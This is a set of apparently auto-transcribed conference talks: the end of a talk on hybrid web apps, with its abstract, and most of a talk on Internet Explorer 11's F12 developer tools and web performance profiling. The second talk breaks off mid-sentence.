that, and this is likely to continue, so it's likely that more and more things that were traditionally mobile apps for performance reasons or for access reasons will just move to Web. So this is something that you're building now. I did say though that it's not perfect. Anyone that sort of tells you that this is the only way to do things is almost certainly wrong. The really big one is performance. So every layer of abstraction you add obviously have some performance cost, depends how important that is to you, what your app's doing, but hybrid apps definitely have a performance cost, especially on older hardware or using the older sort of Cudover style. Modern stuff is not so expensive, but it's still expensive. Look and feel. So your app won't look and feel like native controls, so you can use, there's plugins that will make it easier to build up a native UI using code behind sort of like Xamarin.Forms, but not quite as good to build up native tab controls and that kind of stuff, but to be honest, you tend to fall into this uncanny valley, where your app almost looks native, but not quite, and then users don't respond well. So the more successful ones have just sort of developed their own style. If you think about Facebook where it doesn't really look like a native app on any of them, but the experience is still quite nice. So as long as the experience is nice, users don't really mind. And finally, a big disadvantage is that none of this abdicates testing across what is a pretty fragmented platform, especially on older devices. So Android used to ship with a fairly mediocre browser, which gets reused for the Cudover apps. And that browser just didn't do enough to make the apps feel good. So if you have to target older devices, this will be a real pain. On more, if you're lucky enough to be targeting newer devices like Windows Phone 8, then you have IE11 now. On Safari, you have really fast JavaScript with iOS 8 and WebGL. And on Android, it now ships Chrome as part of the OS. So all of the improvements they make to desktop now come to mobile for free. I'm going to have a couple of final slides on sort of what a potential future may be for app development generally. You're a fool to try and predict anything beyond six months, but they told me not to do that live coding demo and that worked. So I'm going to try and do it anyway. You could imagine some sort of future OS that has an entire app model that is purely JavaScript and HTML. So there's been a few attempts at this. Some of them have worked, some of them haven't. So WinJS on Windows 8 allows you to write apps for Windows 8 that are entirely web or HTML and JavaScript based, so built using entirely web technologies and hasn't, I would say, been terribly successful. But this one has seen a lot of growth. This is a screenshot of Chrome OS, which is sort of a, it's good for a very specific set of needs, which is basically I want a browser on a really cheap device which has a really long battery life. And then they also have all of the Chrome packaged apps, so like Postman I showed earlier. So now your app can run across Windows and Chrome OS using the same code base. Another sort of really ambitious one is Firefox OS, previously known as Boot2Gecko. And so the next year will be interesting for this project. It's either going to become very successful in developing countries or likely fail. But it allows you to use a phone very cheap where all of the apps are built using HTML, five and JavaScript. And if you've played with one of these, it's very impressive what they've done. The architecture for both of those and sort of maybe every future sort of OS could be you have some hardware layer. So here I have just the Linux kernel with some drivers, but you can imagine Windows with it there as well. That layer is responsible for doing all of the hardware management. So it interfaces with NFC, it interfaces with the radio and Wi-Fi. On top of that, user land basically becomes a web browser, which wraps up all those native devices and exposes them as hopefully web standard APIs. So in Chrome OS, that's provided by Chromium. And on Firefox OS, that's provided by Gecko. That takes all of the native functions and all of the sort of software level APIs you'd expect, like using some settings management or contacts management, that kind of stuff, and exposes that out all its web APIs. It's really interesting the way Firefox OS is developing, where if you go to the Mozilla page, there is just a list of all the APIs that they think the web needs to really compete on mobile. So things like NFC. So there's no way to do NFC through a web page yet. But Firefox OS, they have to come up with something because they're implementing this. And so they're implementing something now and then putting it through standards committee later. And then all of the apps, in the case of Chrome OS, Firefox OS, and maybe in the future, lots of other platforms as well, all of the apps are just built using HTML5. So just in summary, what I want to get across to you is that hybrid apps have matured. They started on mobile but aren't just there anymore. They now work across a range of devices. But still, this massive caveat that you can't just switch off your brain. They won't be a fit for all projects. But they fit for more projects today than they ever have before. And in a year, they'll fit for even more. So thank you very much for listening. I've got, I think it's a little bit early. So if you have any questions, I can take them. Otherwise, you can tweet me at Kev from around a few questions. I'll come up later. Thanks. Are there any questions? Cool. Thanks. Thank you. Thank you.
|
Bad news, folks - the number of devices we have to support isn't going to get any smaller. As developers, we now support a plethora of devices and platforms ranging from cheap Android phones through to iPads and even (it's true!) traditional desktop PCs. That would be fine, except we rarely have any extra development time to optimise for them! There is good new, though! Hybrid apps continue to let us target all these form factors with the same core code, and relatively minor additions to create responsive designs. They're not a new concept, but the scope of what is possible has grown significantly. This session will dive into the current state of the art for hybrid, including technologies such as PhoneGap, FireFox OS, Chrome Packaged Apps and node-webkit. By the time you leave, you'll know exactly what you need to build a modern hybrid app which is perfectly suited to your multi-device ecosystem.
|
10.5446/50818 (DOI)
|
Hello, everybody. Hello, that one last guy just coming in. Come in. There's plenty of seats. I'm Martin Beebe. I'm from the UK. Anyone from the UK? Not many. Okay. I'm a developer evangelist in the developer relations team over there. I'm speaking about Internet Explorer F12 developer tools. Is everyone okay with that? Is that what you've come for? Good, good. And so we're going to be talking about the kinds of things which are new in the sort of tools. It's not going to be a 101 necessarily of our tools. It's going to be showing you the things that are new since the April release and a few things which I think are really interesting when you're trying to debug and look at performance in your website. And so we're going to be looking at a few things around the tools. The things that you can do with those F12 tools. We'll look at the web runtime architecture so we can see the places that we may need to optimize in our own web applications and the way that we can use those tools to get that to optimize it. And then we'll look at some real world demos, some real world problems which we will have traced using these tools. I do a lot of debugging. I've been a web developer for over 12 years. This is me when I was 16. I do a lot of debugging. It's only two years ago. Actually 18 years old now. And it's really frustrating. Debugging is one of the worst parts of web development in my opinion. And to be honest, the Internet Explorer DevTools have never really been very good up until there was a mark change in IE9 around funding and development inside of them. But they got a little bit better with IE10 and they've got a lot better with IE11 where we're kind of catching up to what our competition are doing in terms of developer tools. But also in some small areas, actually doing things differently from them and giving you more insight into the Dev Platform in different ways from our competitors, which is interesting. One of the things that's really quite interesting or cool about the new F12 tools is that the release that they just shipped, which was in April, was sort of out of band. Like they did an IE11 release back in November or something like that. And then they shipped again the tools just back in April. So they're shipping the DevTools in a much more sort of regular cadence, which is really interesting. They're adding new features out of band of IE11. So the actual DevTools that you will have got, you will have if you have IE11 installed on your machine, should have been updated back in April to this version that we're going to be talking about today. All of the updating in IE now happens silently in the same way that it does with other browsers. So we should be seeing people move more quickly up the chain and to the newer browsers. And also this is quite interesting. There's these new tools, but also like WebGL features as well, were dropped in between releases. So it's quite interesting that seeing that team working in a more agile kind of way. How many people have not seen the F12 tools before? Have never opened in an Explorer 11 and seen these tools. One person. If you've ever seen any other browser developers, browser vendors tools, it does very similar things. You can select elements, you can look at the CSS, you can choose to manipulate the DOM. There's eight different tools in total. And maybe if I use this, I could probably do this a little bit easier. These tools along the side, does that come out? There's eight tools in total. We've got DOM explorers, we've got memory profilers, we've got CSS editors. We've got all sorts of different things in the chain of what we're able to do. And I'm going to talk about the things which are kind of new in the developer tools. So first up we have one thing to point out is that these tools are in IE 11 across Windows 8.1 and across Windows 7 as well. It's not specific to the latest version of Windows. It's also on Windows 7. So any version of Windows IE 11 will be updatable to these tools. So you can get these on Windows 7 as well. So this is the NDC website. And we're going to look at this area where we've got this purple section. I'm going to change that background color by just selecting that element and then just changing it to 336699 which is hotmail blue. Or we can just choose from the images, choose from different colors, sorry, can choose and settle upon maybe. This is your, weirdly is not, it's your mind. Click on something like blue violet. So we can change a background property of an element quite simply. There you would expect that to be able to be done. We can go over here and we can select the, to delete an item. And you'll notice as I'm changing these elements there's a very small color to the side of the property which indicates that this has been changed. There's been some kind of manipulation done on this. And we only just added this in the latest version of the tools and it just shows all the changes between versions. And we can see here a delta between what I originally had in our CSS and this is a sort of diff file. We can then just go into that changes tab, cut and paste those CSS changes and then paste them into an editor. I'm just going to paste them into the console here. But you'll see as you make those manipulations and CSS changes directly inside of the CSS editor you can then go to the new changes tab and you can directly cut and paste those changes and put them back into your editor and back into your website. It was quite hard to do that in the previous tools. You would make these changes, you'd do lots of different manipulations and so forth and then it was difficult to actually go and get that stuff and put it back into your website. And this enables that and makes it slightly easier. Another really simple feature that I've added to the DOM is the ability to reorder the DOM and manipulate the DOM at will. So we can sort of drag elements around the DOM using the DOM Explorer. So if I were to select an element here and bring up the F12 tools I can take a div, like the bottom div, the bottom section of this website and I can drag and drop it to different sections. So you can manipulate the DOM, you can edit the DOM, you could add elements, you can delete elements, you can move elements around. All kind of basic kind of simple stuff. One of the problems that we used to have a lot inside of IE 11 tools or something which was a constant sort of request or feature request was when you are editing CSS elements and they have pseudo states like hover states. It's very, very difficult to work on that CSS because it's difficult to hover over an element and check its CSS properties without having too much. So what we've done is I've given you the ability to scroll over, say on the bottom of the NDC site you have these little elements which you, as you scroll over on the bottom and they change and their background color changes slightly. What you can do is you can select one of those elements and then if you press this little A colon which is just up in the corner here, you can click on that and then you can enable the hover state for that element and when you enable a hover element then the CSS changes because it's had the hover state applied to it. So here we can change that background from 3 through 3 to something like hot pink. Notice again the color just to the left of background has changed as a manipulation which has happened here to our CSS and now that's been applied across the document and we can switch the hover state on and off. It's very useful when you're trying to do CSS debugging specifically when you're dealing with pseudo states like hover and things like followed or visited on Horeff links as well. So that's kind of some of the newer features around the DOM Explorer. So next up is some of the stuff we've done with JavaScript. Now with JavaScript for a long while you've been able to add breakpoints, watches to your JavaScript code. You can debug it, you can go in there, you can have a look at variables, you can expand collections, you can look at objects and so forth. But one of the complications that we have in this modern world is that a lot of the JavaScript we have on our web page is not our own JavaScript. It's actually other people's JavaScript. So we might be using Angular, we might be using jQuery. And when you're trying to debug that stuff it's very, very difficult to figure out what's your code and what's in these libraries. And inevitably the bugs probably exist in your code and not the libraries. So while we're trying to sort of step through this code and breakpoint through this code, what we want to try and do is create a way of just debugging your code rather than debugging jQuery, a minified version of jQuery. So we added this feature called Just My Code which C Sharp developers might recognize from Visual Studio. So the actual team which work on the DevTools in IE now are actually part of the Visual Studio team. They're the same people which build the tools for the Windows 8 JavaScript applications. So if you've seen these tools, the F12 tools, they actually exist directly embedded inside of Visual Studio as well. It's all built by the same team, whereas it used to be built by Internet Explorer. So for example, here we go, we have a, in the inside of the debugger we have a breakpoint and on the NDC website and we put it onto a function called setPopup. And you see as I step through it, I end up in this library, jQuery 1.8.2, an old version of jQuery. And you'll notice as I step through this code, I'm just ending up in this sort of, I'm not in my code anymore, I don't even know where I am, I'm in this sort of world of jQuery, very clever stuff but I've got no idea what it is. So I can press this one which says debug my own code. And then if I play this again, what you'll note is we step through it and we end up back in jQuery again. Because at the moment, they're not using a minified version of jQuery, so the IE's not picking up as different code. So we use this little tool here and say actually this piece of code is actually an external library and then we restart that code again and then this time when we step through and play, we'll refresh the website, what will happen is we will only step through our code and we won't actually end up inside of jQuery. So it's your only stepping through code which is your own code, you're not stepping through other libraries and so forth. And I mentioned this a moment ago that how do we know which libraries are there? There's some basic sort of pattern matching in there which says if it contains.min, i.e. it's a minified version file, then it will set it automatically as it's not your code. And there's a few other rules as well. But generally you're going to be going in here and you're going to be setting these files as in this instance, this jQuery file, it doesn't belong to me or it's done by some other developer on my team. I don't need to debug that, I just need to debug my own code. And this is quite useful because not only is it stopping that idea of as you're stepping through code, it's also stopping any frames appearing in the call stack as well from their code. So their code will just have one single frame rather than all of the different deep calls that it might have in the call stack, it will just have one single frame. Also, any first-chance exceptions, so for example you can in the debugger switch on first-chance exceptions to kind of debug things like where you might have something which is contained in a try-catch block. And you could switch on first-chance exceptions so that it will always break, even though it's catched, it will still break because you want it to be debugging something there. But when you have just my code enabled, all those exceptions are only going to be thrown if they belong to your code and not if they are in other libraries. Because other libraries might be using sort of featured detection to do this sort of stuff as well. So things, it's not just the step through and the debugging, it's also first-chance exceptions and so forth as well. Another new feature we've added, there's a community project called Source Maps. Google have had this for a little while and the idea is in modern web development you're often not developing standard JavaScript or standard CSS anymore. You're often using abstractions like less or abstractions like TypeScript or CoffeeScript to produce your JavaScript. And the problem arises is you're writing, say, your CoffeeScript file and it has all your clever little properties and methods and so forth in it. But then when it actually goes into production or onto the actual website and you're using developer tools, you're dealing with the outputted JavaScript of those tools. You're not dealing with CoffeeScript, you're not dealing with TypeScript, you're dealing with the output of those tools. And for a developer which has never seen that output, it could be quite confusing. TypeScript doesn't offer a lot of things for you which you don't necessarily need to know as a developer. So when you're trying to debug it, it can become very confusing. So this concept of Source Maps became a, so it's not a standard but it's a community project which was started outside of Internet Explorer. And all it does really is a way of saying between two files, if you're at point X in one file, what's the relationship between another file? So if I'm in a TypeScript file and I'm at line 15, what line is that actually in JavaScript on the other side? And what that means is that we can then sort of wire up debugging so that you can debug your own, your actual TypeScript rather than the sort of outputted JavaScript. So we'll take a look at that. So if we look at the TypeScript website, they actually have a Source Map enabled. And they have a JavaScript file and then they've got a TypeScript file which is linked up to it. And so if we, if this plays, they have this little thing at the bottom, like a little cloud which is actually done in Babylon.js. Okay. Don't know why that video is not playing. Well, there we go. So we've got a, on the TypeScript website, we've got these clouds which are running and that's actually generated by a TypeScript file. So if you go into the debugger, into the script files here, you'll see that there is a file called cloud.ts, not.js, it's.cloud.ts. So this is the TypeScript file which is used to then go and generate the JavaScript. And you can see you've got all of your TypeScript stuff in there. And we can actually add breakpoints now to TypeScript even though the website's dealing with JavaScript because of this source mapping functionality. So if I add a breakpoint in there, it breaks at that point even though the browser's sort of interpreting JavaScript, we're breaking inside of TypeScript. So we can debug in the code that we wrote rather than the code that was generated by the compiler, by the TypeScript compiler. And we can step through our code just as if we were using debugging JavaScript. And this will work with any kind of source mapped generated files. So TypeScript, when you compile it, there's a flag which you can say to generate a source map. There's lots of different languages, CoffeeScript and TypeScript being some of the most popular, but there's lots of different languages which use this. And the cool thing is when you're in a TypeScript file, you can press this button to switch off the TypeScript and just go back to vanilla JS. So you can sort of compare your original TypeScript to the output of JavaScript to that content. And it's doing this all using source maps. This is a feature which has been in Google Chrome for a little while now. And the same is true, obviously, as well of CoffeeScript. So it's exactly the same principle. We go into the file and rather than the TS file, we have a.coffee script if you're not aware, it's kind of like a Ruby-based syntax for generating JavaScript. And we can put breakpoints in there. And it's going to correspond with actually the breakpoints in real JavaScript. So we can inspect elements and so forth as well. And we can do the same thing about switching between the CoffeeScript and the output of JavaScript as well. So it's really useful if you're a CoffeeScript or TypeScript developer and you want to stay in that world rather than having to deal with the outputted JavaScript. It's really quite powerful. One of the big problems with IE11, the original tools, where you would often get yourself heavily involved in some debugging. And you would have breakpoints set up everywhere. You'd have watches and so forth set up everywhere. And you'd mistakenly close down the browser. And then if you opened it back up, all your watches, all of your breakpoints, had all disappeared. And you had to get yourself back into that position so you can start debugging again. One of the things we've added back in there is this persistence. So not only are we persisting the breakpoints and all of the watches that you might have created when you're debugging from the tools, it will also, all the tabs that you have open, all the documents that you have open in your tools will also start back up exactly where you left off. So if you're doing a lot of a big, huge project, it can be really, really beneficial. I also added a few different ways of navigating using the keyboard inside of the DevTools. So one which I commonly use is Control Shift F. And it's kind of just get me out of here. So you are debugging code and so forth. And you've got too far into deep. And you just want to restart the whole thing and restart the whole experience. You just press Control Shift F and it's like a refresh of the browser. It just goes back into the tools from clean. We've always had this feature to navigate between the different elements inside of the DevTools. So there's eight different tools inside of the DevTools. And you could say so Control 1, it would go to the first one. Control 2, it would go to the second one. And then on the third, it would go to the debugger. And you can, it's useful because actually that's quite a fiddly menu structure when you're using it specifically on a, specifically with a mouse and specifically when it's very short. And it's actually quite useful if you're doing, if you're using your keyboard, just to press Control 1, Contrast to get the DomExplorer up and so forth. One thing which we added with the new version is Control Brace. And Control Brace allows you to move up one or Control Close Brace allows you to move down. So it's just another way of moving up and down all the different tools there directly from the keyboard, which is quite useful. Whenever I show DevTools out to developers who have been using Chrome DevTools, one of the things they would always complain about was our console.log functionality. If in JavaScript you want to log an object, for example, you would say console.log and you would say, I don't know, console.log window or console.log body. In Chrome, you would get a full object tree of body or you get a full, whatever you passing you would get that as an object, i.e. previously would convert that into a string literal and you'd just get object object. And it would be absolutely, it would be kind of useless. So we fixed that. So you can say console.log, throwing any object and then you can inspect that object at any time. And it's useful, you know, if you're, if you've got properties which hand around in the global namespace and you want to inspect them, you can just console.log put your object through and see that. We went a little bit further than that as well and we've labelled the ability to add multiple objects. So you can console.log and then send an array, well, a list, sorry, of objects. And it's going to be two, it can be three or it can be four. And what's outputted is you have a, you will get a sort of array, a node array of all of the different objects so you can inspect them separately. And it's quite useful if you've just, you know, you don't want to, you know, a quick look up of a lot of objects at once and just get them all on screen so that you can inspect them. So for messaging or writing messages out to the console, this can be quite useful, is the ability to console.log a string. So if you've ever done string formatting in C sharp, it's kind of a slightly rudimentary way of doing a string.format where you go console.log and you pass in a string and then you have these sort of percentage s and percentage s here. And that relates to the first object and the second object. And what it will do is it will just to string those objects and put them into the string. So you end up with this, oh wow, it's percentage s and I'm reading percentage s and I'm passing in date and document title. You end up with those objects all put out in a string. Oh wow, it's Thursday, Jan 5th, I did this yesterday and I'm reading the document title which is NDC Oslo. Useful as well because not only does it give you the string, it also gives you the objects as well. And so you can go into them and check them out as well. You don't just end up with a string, you also end up with the object. So console.log has been massively improved. There was also a terrible thing that we did in IE 8 and IE 9 which was completely different to other browsers, whereas if you called console.log from your website and the dev tools were not open, you would throw an error. Did anyone ever get caught by that issue? It's in production for me. I put stuff like console.log in my websites all the time and then it would stop working in IE for some reason. It was just because console was always an object on every other vendor's browser tools but on ours it wasn't. I think we solved that in around IE 9 but what we now do is allow you to, when you console.log anything, if you have this setting set which is inside of your internet options, always record developer console messages, even if you haven't got the tools open it's always going to be logging console.log. So if you went to a website and there was a ton of console.logs which happened and then you opened the tools, you'll still see those console.logs appear in your console. So you don't have to then go and refresh the page. All that stuff is recorded and that picture is some old logging. Never mind. When we are working with, we're all using jQuery now, right? One uses jQuery and it's really dull to write document.getElement by ID over and over again when you can just use this beautiful little dollar sign everywhere. If you're obviously working on a website which has got jQuery, you can just inside the console put the dollar sign and use it, use the shizzle selector to your heart's content. But if you don't, all the other browsers to manufacturers enabled to still select elements by ID using the dollar sign and IE never used to. We added I think in IE 11. So you can just say dollar and then pass a selector or an ID of an element ID and it's going to return the object which it matches. Another one which is quite useful is dollar underscore which returns whatever the last object was that you committed to the console. So in this instance we use dollar, dollar, H1. And dollar, dollar, H1 is another little dollar trick which will return an array of all the H1s on the document. So I've got all the whole array which is then returned is like this node list here and it's only actually got one in the actual whole document. And then I'm actually not sure that this is even helping with all this circling, never mind. And then we can use dollar underscore zero to return, it takes the last object and then it's the index, the zero index of that last object. And then that returns the H1 and then we can say dollar underscore dot inner HTML. So we can build upon an object again and again by getting the last object that we committed to the console. And the reason why we would do this rather than just writing all as one line string which would be dollar, dollar, H1, dot, index zero dot inner HTML is that there will be no way of the browser to resolve the intelligence of the object because it has to evaluate all of those selections up front. So by doing this, this way in parts, you're evaluating the objects, I'm gradually building them up and then you can still use intelligence on those objects. So dollar underscore, dollar, dollar, selection and dollar selection have all been added into IE tools to kind of bring us up to par with what other developer tools are doing and it makes it very easy to select all elements and objects from Internet Explorer. But developer tools are not just about debugging your application. In fact, that's the thing that most people will use DevTools for, right? Like the reason why you would pick up IE DevTools would probably be because someone's reported a bug in IE and it's not happening in other browsers so their DevTools are useless because it's only happening in IE. However, there are a number of features that have been added to our DevTools which actually aren't really about debugging necessarily, but also can actually help you improve performance of your web page. And performance really matters nowadays because we're building websites not just for desktops and for powerful Intel Slates and computers and laptops. We're actually building them for mobile phone devices which actually have very restricted hardware. And so it's important to think about things like network, memory and power consumption of your code so that you can deliver an experience which is really good for your users. When you think about network, we have a networking tool and it shows us all of the networking things that happen. It shows you all of the sort of requests that are made and you can calculate how long the requests make and that's a very useful tool and you might see that in Chrome. And you can see that in IE as well and it's in Firefox and all the major tools. And that's really useful because it helps us understand what the band, how much is actually getting passed through the pipes and what's getting passed through the pipes. It can also help us understand latency as well. How far are things going? Are we having to go to America to go and pick up that image? Are we going to China to pick up that JavaScript file? And understanding those things and doing a network trace is really useful to kind of solve some of these problems and figure out why a website is not performing well. It might be down to some kind of network problem. If we look at the performance of a website, actually we can do an awful lot to improve the perceived performance of a website just by doing some clever ways of understanding our website and understanding how it works and getting the user content on the screen very, very quickly. So, for example, a web page might take 1.81 seconds to load in its entirety from where the browser considers it completely loaded. But in this particular page, the actual times of glass or the time which we actually put something on the screen is 0.65 seconds. And that's really the thing that counts because that's the perceived performance of that website. And there's a lot of ways and there's a lot of these developer tools inside of Internet Explorer now are helping you to discover how you can get this perceived performance improved, not just overall page load times, but actually how we can make it feel like it's faster as well. We'll see that on this trace particularly there's CPU time of 1.39 seconds. That means there's an idle CPU time of 0.42 seconds which we could benefit if we understood how our website is working and why and how we're using CPU, we could improve this even further and we could reduce the overall load times of this web page by using having better CPU utilization. One of the biggest problems which happen with specifically single page applications is memory utilization. And one of the biggest problems that we face with memory utilization is images. It seems ridiculous. It's not problems of creating too many objects on the window. It's just using far too many images because every image is decoded and then put onto the stack, on the memory stack. And this is a hockey stick graph of 5,000 websites and we traced each of those memory, the memory footprint of each of the top 5,000 websites. And what you'll notice is that most are kind of under a 20 meg, most websites. And then you've got this small selection of websites which go up to all the way to like 180, 200 megabytes of image memory just to load on a single web page, on a single page. And this happens quite a lot. This is one of the biggest problems when people come to us with performance problems with their websites. It's often just misuse of images and overuse of images. So understanding memory and how you're using your memory in your application is really important as well. And the other thing is power consumption. Obviously people are using mobile devices and they are less likely to use applications which drain their battery. And it's probably easier than you think to drain someone's battery. Say for example you're writing a HTML5 application for this phone and it was like a GPS sat nav kind of application. Okay, so if you're a sat nav you're going to need to go to the GPS so you're going to have to enable the antenna. So that's probably going to be using like 2 watts of electricity or something like that. And then you're going to be taking some images, some map tiles and you're going to be loading them on the GPU and you're going to be loading them on the website. So you're going to be using the GPU, that's going to be an extra watts or 3 watts. And then maybe because there's quite a lot of computation which is going on you're going to be using an extra core in that device as well. That could be an extra couple of watts as well. Soon you're up to like 5 watts of electricity, the maximum that a phone can use. And all of a sudden your phone starts getting really hot because you're using all of the features of this phone. It's very easy in a single page application to start using loads and loads of features. You're starting using the antenna, you're starting using the GPU, you're starting using multi-cores. All of a sudden the phone's getting really, really hot. And it's getting really hot and the battery is draining. So what the most users do, well they take their phone and they plug it in. Because it's a sat nav they'll probably be able to plug it into their car and it's fine. But it's not fine because the phone is getting really hot. It sort of enables thermal mitigation and it says I'm too hot, I'm too hot to charge. So it stops charging because it's a way of reducing the heat on the phone. It's still running your application, it's still draining the application. And you end up in a situation where the phone just dies because you were trying to do some very complicated stuff continuously using a very low powered device. And that device will eventually run out of battery because it's trying to keep itself cool. And it won't charge when it's trying to keep itself cool. So understanding how you're using or how many of the subsystems you're using and what you're doing with your web application is really important. Not just for memory, not just for speed, but also for power consumption as well. And really performance in a website isn't just about being fast, it's also about being efficient. If we look at the way that the web works or the way a browser works and what it does. So we start off, make a request for a web page as networking, DNS translations, all that sort of thing. We actually go and get the files, all the different references. I think there's something like 94 in an average payload, there's 94 requests that go off. 94 requests that go off, we can actually only service for the same DNS name, same domain name, we can only service six of those at a time. We can't do, so if they all came off the same domain, we wouldn't be able, they would block, we'd do it in batches of six and they would block and block and block. So if you're spreading across different DNS names and so forth, that's useful, a way of improving the network performance potentially. But then the more different domains that you have, the more DNS lookups that you have. And so networking isn't as simple as just using a CDN, it can be more complicated than, it's different depending on each website. Then we take all of those files and we pass them. So all your HTML or the CSS files and so forth, we pass all of those things and with the HTML thing, we create a DOM tree, a list of all the objects in the DOM. It has no recollection of the styles which are going to be applied at this point, it's just objects in a tree. We take the CSS cascade, which is all of the styles and so forth, we interpret JavaScript. It's important here that we have to interpret all of the JavaScript which is loaded into the page before we can move on to the next point because it could affect the DOM tree. There's DOM APIs which actually JavaScript is in the sandbox, these DOM APIs might come out of that sandbox and affect things in the system. And then once we've got all of this, we've got the CSS tree, we've got the DOM tree, we've got the CSS, we then can start formatting and applying to these DOM elements and all the formats. And then we know where things should be so we can start laying things out. And we lay them out as like rectangles on the screen. And then once we've laid out everything out, we know where everything should be, we know what colors it should be. It goes to a thing called a display tree. And IE is then ready to paint. Paint what it has in its display tree to the GPU, to the computer. And I say ready to paint because IE doesn't decide when it paints, the monitor decides when it paints because it has a refresh rate of say 60 hertz, it can repaint say every 16 milliseconds. So there's a hardware interrupt which goes back to IE through Windows and says, I'm ready to paint. Have you got a new display tree for me? And IE says, yes, I've got a new display tree, here you go. So it's quite important to correlate display trees with paints because if we're doing all this work of calculating the display tree and not painting it, that's all just wasted CPU cycles. And then we actually then go and paint that display tree when we get this hardware sync, v-sync we call them. When we get that, we can then paint it to the screen. And we composite all that information and we do lots of fancy tricks in IE. We do a lot more compositing in direct text than I think anyone else, practically everyone else. Most of we're basically painting surfaces using direct text. And then when we, so everything from text to SVGs to everything, even JPEGs now are all being, we're using direct text to paint those things. And then we, and then someone can actually go and edit that document or they could change it by manipulating the screen and so forth or changing, and then we have to go through this whole cycle again and again and again and again. And obviously this iterates and iterates and iterates and iterates and iterates and iterates. New DOM trees, new display trees, all of the time being created as things are changed and things are manipulated. Every time you manipulate, we have to create a new DOM tree because something has changed. And it's important to make sure that you don't create ones which are pointless because that's all just wasted CPU cycles. So if I go to something like, this is quite an interesting point where we paint these GPU surfaces, we paint these surfaces and then someone might use a touch device and they might pinch zoom. And what we do in Internet Explorer is we do, you can actually see how we're interacting directly with the bitmap on the GPU so this doesn't actually go back to the browser at all. So if I zoom in, you'll know that the arrow function, that text is really jaggy. As soon as I let go, it goes back to the display and it repaints the whole screen. But actually when I'm manipulating the screen there, I'm actually manipulating directly on the GPU. It's not going back to Internet Explorer to do any of that manipulation. It's only when I let go of the screen. And we do quite a lot of things like that which try and prove the overall performance by leveraging the GPU rather than having to do full repaints. And it means that when you're doing things like to semantically zoom or moving and zooming certain the site, you're not blocking the UI thread from doing other things. Okay, so how do we get intimate insight into what actually is happening here? That whole tree, how do we figure out what's going on there? Well, there's a thing called the event tracing for Windows and it logs events, it gives insights to the platform and it traces the CPU. And basically there are two tools, oops, there are two tools which kind of interrogate that information which comes out from that Windows system. One is the UI responsiveness tab on the F12 developer tools, which is at the top there. And the other is the Windows performance toolkit. And in the IE team, if you ever see any of the engineers doing performance debugging, they will use both one or either of these tools. They give slightly different results, they're intended for slightly different things. The F12 tools are the ones that we're going to look into. And I said earlier that the images are a real big problem in terms of using oversized images or using too many images. Well, this is two traces using that UI responsiveness tab, which we have done on a website called physicsafaster.io forward slash demos. It's called the right size image demo. And the top graph is a website which is taking all of the images and the images are much larger than their actual space and then they're resized by the browser. And this is quite a common technique now because of retina displays. People are just throwing up a very, very large image and then resizing it so it looks better on retina screens. But the problem you'll see is this kind of ton of blue in that top graph. And all of that blue, if I can zoom in, I don't know if I can. All of that blue you'll see on the thing here, on the key at the top, all that blue is image decoding. There's a ton of rendering, there's a ton of image decoding which is going on. And this green bar which runs across the bottom, that is visual throughput. So how often are you running at 60 frames per second? So a full green bar means you're running 60 frames per second and everywhere it dips, these little dips in the middle there and towards the end, all of the places where you're not managing to get to 60 frames per second. And so it basically means that the UI thread, if you're doing animations or anything like that and you haven't got 60 frames per second, it's going to potentially look a little bit jaggy or jumpy because you're not painting enough frames to the screen. So that image decoding, just by having oversized images is causing us problems here. And you'll see by using the right sized images on the bottom graph, we're saving nearly a third of the time. It's improved the speed of the website immensely just by using the right sized images because you're not making, and it's perceptually something you might not necessarily notice as a developer, but you've got to recognize that the browser is having to do a ton of work just to make those images the right size to display on the GPU. The other one is deferring script execution. This is, most people do this nowadays, but it's still, most people don't realize necessarily why they do it. Often people say, don't put script tags in the head of your document. And you can put them in the head of document, but just if you do, make sure that you mark them as async or put the script tags at the bottom of the document. And the reason why this improves performance so much is because every time the browser, any browser encounters JavaScript, by contract it has to execute the entirety of that JavaScript file. So it has to load it from wherever it is, bring it into the browser and then execute it because it could manipulate the DOM tree, it could manipulate the display tree. So you'll see on the first graph, there's this big chunk of white space where nothing's happening. And that's just loading the resource, loading the head, stopping the JavaScript file because that JavaScript file may contain something which edits the document. By putting it, that script file, that long loading script file at the bottom of the page, it will eventually load, but it isn't blocking our UI thread, it isn't blocking us from doing other stuff. So in this instance, I think there's an animation which is happening on the page. And the bottom trace is giving us whether those peaks are happening, that says doing our animation every sort of 16 milliseconds we're doing some kind of animation. And you'll note that the difference in speed is immense. So I'm able to get something happening, some animation happening on the screen on the bottom trace in 84 milliseconds, whereas on the top screen, it's happening in 438 milliseconds. So it's taking an awful lot of time, a lot longer. And the only change I'm making on that page is moving my scripts from my head to the bottom of my page. The other thing you often see a lot of people do is include too many frameworks. So you might have jQuery just to do selection when you could just maybe use document.getElement.id, or you might have Angular in there because you were going to use it but then you decided not to. Or you might have just modernize it but you don't actually do any feature detection. You often find that people will take boilerplate code, have tons and tons of JavaScript libraries in there, not necessarily use any of them, and then you get traces like this. And the top trace is just this C of orange. And that's C of orange's garbage collection. Because although you're not doing anything with those libraries that you've included in your web page, they're still creating objects, or they've created objects on the global namespace somewhere perhaps. And all that has to stay in memory somewhere. So if you've got lots of memory on the page and it's being used again and again, there's different things loading all the time, then garbage collection has to kick in. And every time garbage collection kicks in, it's going to be interrupting your UI thread, it's going to be interrupting your CPU. So that C of orange means every time, it just means basically if I was to look at this trace, it shows me that there's just far too much garbage collection going on. And so there's, for some reason, there's just far too many objects which are being, which need to be destroyed. We're getting to the upper limits of our memory. And for this demo, this example, this demo, the frameworks which are included don't actually do anything. They just initialize. And then, you know, we've got these memory problems already. So reducing the number of frameworks can really help. This is quite a complicated one to explain, but coalescing style and layout changes. So this is an example where on the left hand side, you see a little menu. And that menu is being controlled at the moment as I scroll. And that's not a particularly great way of doing it. And then this time, as I'm moving up and down, it's rather than being controlled by the scroll mechanism, on a specific frequency, it's updating the position and then using CSS3 animations to move the object. Now, the first instance where we're tying an element and then every time we scroll, there's a scroll event, we're moving that object, that's a very high definition input. There's tons of, every time you scroll, which could happen like every two or three milliseconds, you're basically saying to the DOM tree, what you had before, sorry, your display tree, what you had before is no good anymore. Throw that away and create a new display tree. Throw that away and create a new display tree because you're moving something on the document every, say, 10 milliseconds. But we're not actually drawing it to screen. So we're creating this display tree and we're not drawing it to screen, so it's all just wasted CPU cycles. So what you want to try and do is you want to link the work that you're going to be done and make sure that when we do work, it actually end up being painted on the screen. So rather than using an event for a wheel mouse event, for example, moving up and down, it would be better to use something like request animation frame, which is a JavaScript API, which fires basically an event every time we get this interrupt from the monitor. Every time we can print, we can paint the monitor, sorry, we're going to respond, request animation frame is going to throw up an event 